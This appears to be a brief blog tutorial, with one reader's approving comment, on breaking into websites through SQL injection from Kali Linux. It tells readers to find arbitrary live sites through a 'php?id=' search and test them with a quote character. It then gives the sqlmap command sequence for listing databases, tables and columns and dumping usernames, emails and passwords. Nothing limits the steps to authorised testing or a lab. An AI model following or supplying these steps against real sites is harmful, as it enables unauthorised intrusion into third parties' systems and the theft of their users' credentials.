In this tutorial, we will discuss how to hack site using sql injection in kali linux.
1. Run Kali Linux.
2. Start Iceweasel browser and search the query "php?id=".
3. Then click on any link any check the vulnerablity of the site by adding ' quote in the url.
4. If site shows error then it means it is vulnerable.
5. Then copy the link of the site without ' quote.
6. Now open terminal and type sqlmap -u (urlofthesite) --dbs.
7. Wait for few seconds while the scanning is complete.
8. After the completion, type sqlmap -u (urlofthesite) -D (databasename) --tables.
9. After that type sqlmap -u (urlofthesite) -D (databasename) -T (nameofthetable) --columns.
10. After that type sqlmap -u (urlofthesite) -D (databasename) -T (nameofthetable) -C column1,column2 --dump
Then you get the data you want like username, email, password, etc.
This is really very usefull.
ReplyDelete